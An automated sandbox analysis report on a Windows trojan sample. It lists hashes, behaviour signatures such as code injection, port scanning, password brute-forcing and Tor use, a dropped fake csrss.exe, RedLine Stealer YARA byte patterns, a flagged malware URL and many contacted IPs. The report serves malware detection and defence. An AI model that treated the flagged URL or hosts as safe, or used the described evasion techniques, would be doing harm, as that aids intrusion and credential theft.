Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
klWGq3yDcQ.exe

Overview

General Information

Sample Name:klWGq3yDcQ.exe
Original Sample Name:fe049ddd0ffd2df34da564208aff9cec.exe
Analysis ID:1347877
MD5:fe049ddd0ffd2df34da564208aff9cec
SHA1:1df42bae63a1698b6070b198f9dceb3ac2b1338e
SHA256:aa16eed6abd2118df6b0670813ae3b9dab59b458bdc76222866c9a9fc0fa1409
Tags:32CMSBruteexetrojan
Infos:

Detection

Score:99
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found Tor onion address
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Probes for web service weaknesses (weak passwords or vulnerabilities)
Injects a PE file into a foreign processes
Found C&C like URL pattern
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Tries to resolve many domain names, but no domain seems valid
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Connects to many different domains
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Uses SMTP (mail sending)
Uses FTP
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • klWGq3yDcQ.exe (PID: 7116 cmdline: C:\Users\user\Desktop\klWGq3yDcQ.exe MD5: FE049DDD0FFD2DF34DA564208AFF9CEC)
    • klWGq3yDcQ.exe (PID: 6240 cmdline: C:\Users\user\Desktop\klWGq3yDcQ.exe MD5: FE049DDD0FFD2DF34DA564208AFF9CEC)
      • WerFault.exe (PID: 12328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 5984 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 25500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 13300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38328 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • csrss.exe (PID: 6216 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: FE049DDD0FFD2DF34DA564208AFF9CEC)
    • csrss.exe (PID: 6544 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: FE049DDD0FFD2DF34DA564208AFF9CEC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.2.4139.162.169.4551025802813008 11/26/23-06:59:44.879605
SID:2813008
Source Port:51025
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:34.136.104.255192.168.2.4443562922047070 11/26/23-06:59:32.817382
SID:2047070
Source Port:443
Destination Port:56292
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: klWGq3yDcQ.exeReversingLabs: Detection: 70%
Source: klWGq3yDcQ.exeVirustotal: Detection: 67%Perma Link
Antivirus detection for URL or domain
Source: https://tiswheels.com/administrator/index.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Drivers\csrss.exeReversingLabs: Detection: 70%
Machine Learning detection for sample
Source: klWGq3yDcQ.exeJoe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
Source: klWGq3yDcQ.exe, 00000001.00000003.1804570525.0000000003459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_1c41ca20-e
Source: klWGq3yDcQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:50256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.237.190.156:443 -> 192.168.2.4:50350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.234.162.143:443 -> 192.168.2.4:50333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:50671 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:50136 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50933 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.4:51000 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.4:51068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 44.219.53.183:443 -> 192.168.2.4:50497 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:50603 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.224.218:443 -> 192.168.2.4:50766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:50997 version: TLS 1.2
Source: unknownHTTPS traffic detected: 139.162.169.45:443 -> 192.168.2.4:50950 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:50961 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:50953 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:50951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:51631 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:50971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:51058 version: TLS 1.2
Source: unknownHTTPS traffic detected: 191.6.210.8:443 -> 192.168.2.4:50999 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:51675 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:51486 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:51752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.96.211.44:443 -> 192.168.2.4:51781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:51774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:51761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 109.168.109.224:443 -> 192.168.2.4:51627 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:51386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:52336 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.224.212.226:443 -> 192.168.2.4:52342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 148.66.138.193:443 -> 192.168.2.4:50955 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:52329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:53656 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:51886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:55011 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:53665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:55160 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:55052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:55178 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.4:55227 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:55174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:55292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:53670 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:55326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:55230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.81.150.60:443 -> 192.168.2.4:55269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.144.64.233:443 -> 192.168.2.4:55288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:55239 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.4:55239 -> 72.167.58.161:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:55181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:55235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:55067 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.234.155.54:443 -> 192.168.2.4:55166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.247.74.107:443 -> 192.168.2.4:55442 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:55508 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:55713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:55510 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.124.249.13:443 -> 192.168.2.4:55832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:55523 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.214.252.247:443 -> 192.168.2.4:55485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.63.202:443 -> 192.168.2.4:55789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:55811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.183.156.218:443 -> 192.168.2.4:55795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.169.145.157:443 -> 192.168.2.4:55792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 191.252.51.5:443 -> 192.168.2.4:55516 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:55995 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:56010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:56194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:56241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:56280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:56272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:56294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:56295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56500 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:56290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56573 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.144.64.233:443 -> 192.168.2.4:56382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:56630 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:56356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:56608 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56639 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56484 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56935 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:56824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:56808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56951 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:56954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:56707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.11:443 -> 192.168.2.4:57025 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:56711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:57122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:57219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:57220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:57010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:57320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:57148 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:57304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.16.72:443 -> 192.168.2.4:57541 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:57317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57547 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57546 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:57721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:57806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:57780 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:57660 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:57697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.159.64:443 -> 192.168.2.4:57703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:57704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:57773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:58082 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:58189 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:58092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:58376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:58375 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:58227 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:58084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:58091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:58112 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:58207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:58173 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:58374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.226.37.158:443 -> 192.168.2.4:58421 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:58653 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:58684 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.62.220:443 -> 192.168.2.4:58930 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:58462 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:58881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:58897 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:58848 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:58761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:58740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:59748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:59753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:59690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:59735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59949 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:59691 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:59950 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:59948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:59954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:59774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.11:443 -> 192.168.2.4:60016 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:59942 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:60008 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:60073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:59993 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:59840 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:60019 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:60287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:60030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:60021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:60288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:60052 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:59989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:60140 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:60415 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:60031 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.62.143.50:443 -> 192.168.2.4:60289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.246.24.211:443 -> 192.168.2.4:60633 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:60629 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:60622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:60835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:60811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:60810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:60704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:60737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:61651 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:61770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:61744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:61604 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.164.64.246:443 -> 192.168.2.4:61613 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:61650 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:61660 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:61608 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.132.45:443 -> 192.168.2.4:61704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:61621 version: TLS 1.2
Source: unknownHTTPS traffic detected: 78.128.62.138:443 -> 192.168.2.4:61639 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:61598 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:61635 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.54.192.125:443 -> 192.168.2.4:61633 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.240.130.5:443 -> 192.168.2.4:61636 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:61620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:61640 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:61622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:61913 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:61830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:61883 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.96.186.206:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:62180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.202.203.176:443 -> 192.168.2.4:61944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:61943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:62480 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:62477 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.4:62478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.235.14.141:443 -> 192.168.2.4:62485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.34.228.177:443 -> 192.168.2.4:61828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:62479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:61938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:62409 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62657 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:62748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:62809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:62702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62885 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:62881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.203.32.4:443 -> 192.168.2.4:62828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.83.33.36:443 -> 192.168.2.4:62834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:62753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.32.208.27:443 -> 192.168.2.4:62910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:62749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62902 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62840 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:62843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.7.37:443 -> 192.168.2.4:62841 version: TLS 1.2
Source: unknownHTTPS traffic detected: 72.167.58.161:443 -> 192.168.2.4:62886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.245:443 -> 192.168.2.4:62844 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.200.30.31:443 -> 192.168.2.4:63214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:62908 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:62925 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.208.26.152:443 -> 192.168.2.4:62944 version: TLS 1.2
